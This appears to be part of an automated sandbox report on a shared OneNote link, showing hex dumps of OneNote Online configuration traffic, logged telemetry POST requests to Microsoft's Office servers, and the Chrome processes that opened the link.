77 69 74 68 6d 6f 75 73 65 6f 72 74 6f 75 63 68 69 73 65 6e 61 62 6c 65 64
                                                Data Ascii: 2000almenut;onenotedelayloadhammerjs;onhwrbrowser-treatment;onenote-onenoteuserinfotoosiisenabled-treatment;347ci442;onenote-removecommonjsdependency-treatment;oniss891;387f8957;onenote-moveeducachestols-treatment;onenote-inkingwithmouseortouchisenabled
                                                2022-10-03 13:38:17 UTC257INData Raw: 32 30 30 30 0d 0a 65 4e 6f 74 65 4f 6e 6c 69 6e 65 2e 4f 6e 65 4e 6f 74 65 52 65 61 63 74 43 6f 70 79 55 52 4c 44 69 61 6c 6f 67 49 73 45 6e 61 62 6c 65 64 5c 75 30 30 32 32 3a 5c 75 30 30 32 32 54 72 75 65 5c 75 30 30 32 32 2c 5c 75 30 30 32 32 4d 69 63 72 6f 73 6f 66 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 4f 6e 6c 69 6e 65 2e 4f 4e 45 4e 4f 54 45 46 4c 4f 4f 44 47 41 54 45 46 4c 49 47 48 54 37 5c 75 30 30 32 32 3a 5c 75 30 30 32 32 54 72 75 65 5c 75 30 30 32 32 2c 5c 75 30 30 32 32 4d 69 63 72 6f 73 6f 66 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 4f 6e 6c 69 6e 65 2e 48 77 72 4d 79 4e 6f 74 65 62 6f 6f 6b 49 73 45 6e 61 62 6c 65 64 5c 75 30 30 32 32 3a 5c 75 30 30 32 32 46 61 6c 73 65 5c 75 30 30 32 32 2c 5c 75 30 30 32 32 4d 69 63 72 6f
                                                Data Ascii: 2000eNoteOnline.OneNoteReactCopyURLDialogIsEnabled\u0022:\u0022True\u0022,\u0022Microsoft.Office.OneNoteOnline.ONENOTEFLOODGATEFLIGHT7\u0022:\u0022True\u0022,\u0022Microsoft.Office.OneNoteOnline.HwrMyNotebookIsEnabled\u0022:\u0022False\u0022,\u0022Micro
                                                2022-10-03 13:38:17 UTC265INData Raw: 32 30 30 30 0d 0a 65 3a 20 27 4f 72 67 49 64 50 75 69 64 27 2c 4c 6f 6b 69 43 6f 6d 70 6c 69 61 6e 63 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 3a 20 27 27 2c 4c 6f 6b 69 45 6e 64 70 6f 69 6e 74 46 6f 72 53 65 61 72 63 68 3a 20 27 68 74 74 70 73 3a 5c 75 30 30 32 66 5c 75 30 30 32 66 6c 6f 6b 69 2e 64 65 6c 76 65 2e 6f 66 66 69 63 65 2e 63 6f 6d 27 2c 4c 6f 6b 69 55 73 65 72 44 61 74 61 53 69 67 6e 61 74 75 72 65 3a 20 27 27 2c 4d 61 63 4f 66 66 69 63 65 54 72 69 61 6c 4f 66 66 65 72 45 6e 61 62 6c 65 64 3a 20 27 46 61 6c 73 65 27 2c 4f 41 75 74 68 4d 61 6e 61 67 65 72 44 6f 63 75 6d 65 6e 74 53 65 74 74 69 6e 67 73 3a 20 27 7b 5c 72 5c 6e 20 20 5c 75 30 30 32 32 5f 56 65 72 73 69 6f 6e 5c 75 30 30 32 32 3a 20 34 2c 5c 72 5c 6e 20 20 5c 75 30 30 32 32 4f 41 75
                                                Data Ascii: 2000e: 'OrgIdPuid',LokiComplianceEnvironment: '',LokiEndpointForSearch: 'https:\u002f\u002floki.delve.office.com',LokiUserDataSignature: '',MacOfficeTrialOfferEnabled: 'False',OAuthManagerDocumentSettings: '{\r\n \u0022_Version\u0022: 4,\r\n \u0022OAu
                                                2022-10-03 13:38:17 UTC273INData Raw: 65 39 62 0d 0a 63 61 6c 49 6d 61 67 65 49 73 45 6e 61 62 6c 65 64 3a 20 27 66 61 6c 73 65 27 2c 54 61 62 6c 65 42 6f 72 64 65 72 45 64 69 74 69 6e 67 49 73 45 6e 61 62 6c 65 64 3a 20 27 66 61 6c 73 65 27 2c 43 6f 61 75 74 68 52 65 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 72 45 78 70 65 72 69 6d 65 6e 74 49 73 45 6e 61 62 6c 65 64 3a 20 27 66 61 6c 73 65 27 2c 46 65 65 64 62 61 63 6b 50 61 6e 65 53 63 72 65 65 6e 73 68 6f 74 53 65 6c 65 63 74 65 64 44 65 66 61 75 6c 74 49 73 45 6e 61 62 6c 65 64 3a 20 27 66 61 6c 73 65 27 2c 46 65 65 64 62 61 63 6b 50 61 6e 65 55 73 65 72 56 6f 69 63 65 49 73 45 6e 61 62 6c 65 64 3a 20 27 66 61 6c 73 65 27 2c 49 45 31 31 53 6f 66 74 42 6c 6f 63 6b 43 6f 6d 6d 65 72 63 69 61 6c 49 73 45 6e 61 62 6c 65 64 3a 20 27 66 61 6c 73
                                                Data Ascii: e9bcalImageIsEnabled: 'false',TableBorderEditingIsEnabled: 'false',CoauthReplicationTimerExperimentIsEnabled: 'false',FeedbackPaneScreenshotSelectedDefaultIsEnabled: 'false',FeedbackPaneUserVoiceIsEnabled: 'false',IE11SoftBlockCommercialIsEnabled: 'fals
                                                2022-10-03 13:38:17 UTC277INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.34972613.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:17 UTC232OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 0
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-BrowserUlsBeacon: [{"Index":0,"MsSinceStart":0,"Value":"SessionStarted","Type":"SessionBoundary"}]
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:17 UTC277INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: dfed450d-bcaf-43c0-b63d-d1a58a5a9887
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000006B9
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000006B9
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: tasmigration015,typeheadertest,afd_waccluster,afd_visioslice_control,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: B28AAD7C1586456EB7A806497B6012C7 Ref B: AMS231032604035 Ref C: 2022-10-03T13:38:17Z
                                                Date: Mon, 03 Oct 2022 13:38:17 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                8192.168.2.34973013.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:18 UTC278OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 0
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-BrowserUlsBeacon: [{"Index":1,"MsSinceStart":150,"Value":"https://c1-onenote-15.cdn.office.net:443/o/s/h816A0F42A2BF4732_resources/1036/EditSurface.css","Type":"ResourceDownloadSuccess"}]
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:18 UTC280INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: f0d2e361-86b2-46e1-9f3a-5851a36fec7a
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF00000699
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF00000699
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_visioslice_control,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 2C16ACF0BAED4D22AE6C70E46B5D14DC Ref B: AMS231032602023 Ref C: 2022-10-03T13:38:18Z
                                                Date: Mon, 03 Oct 2022 13:38:17 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                9192.168.2.34973813.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:18 UTC281OUTPOST /o/RemoteUls.ashx?build=16.0.15707.41015&waccluster=GEU2 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                Content-Length: 0
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-BrowserUlsBeacon: [{"Index":2,"MsSinceStart":448,"Value":"Making GetCells Request","Type":"BootLogs"}]
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://euc-onenote.officeapps.live.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                2022-10-03 13:38:18 UTC290INHTTP/1.1 200 OK
                                                Cache-Control: private
                                                Content-Type: text/plain
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 850139f3-dc2a-4022-9211-cca5207e5c2f
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000006BB
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                Access-Control-Allow-Origin: https://euc-onenote.officeapps.live.com
                                                Access-Control-Expose-Headers: X-EndSession, X-CorrelationId, X-OfficeFE, X-NewKey, X-bULS-SuppressionETag, X-bULS-SuppressedTags
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Content-Type-Options: nosniff
                                                X-Download-Options: noopen
                                                Content-Disposition: attachment
                                                X-OFFICEFD: AM1PEPF000006BB
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: D22C0DC629A94B9B83364F971E39BC05 Ref B: AMS231032602003 Ref C: 2022-10-03T13:38:18Z
                                                Date: Mon, 03 Oct 2022 13:38:17 GMT
                                                Connection: close
                                                Content-Length: 0


                                                Click to jump to process

                                                Target ID:0
                                                Start time:15:38:10
                                                Start date:03/10/2022
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                Imagebase:0x7ff614650000
                                                File size:2851656 bytes
                                                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                Target ID:1
                                                Start time:15:38:12
                                                Start date:03/10/2022
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1788,i,15895415173541107671,4193211191602431059,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                                Imagebase:0x7ff614650000
                                                File size:2851656 bytes
                                                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                Target ID:2
                                                Start time:15:38:12
                                                Start date:03/10/2022
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://insacentre-my.sharepoint.com/:o:/g/personal/christel_chevereau_insa-cvl_fr/EiRzYlzmtGdJoxpcLidnoqABdW_125MBX4mxznGrm93yrA?e=ErmP6W
                                                Imagebase:0x7ff614650000
                                                File size:2851656 bytes
                                                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low

                                                No disassembly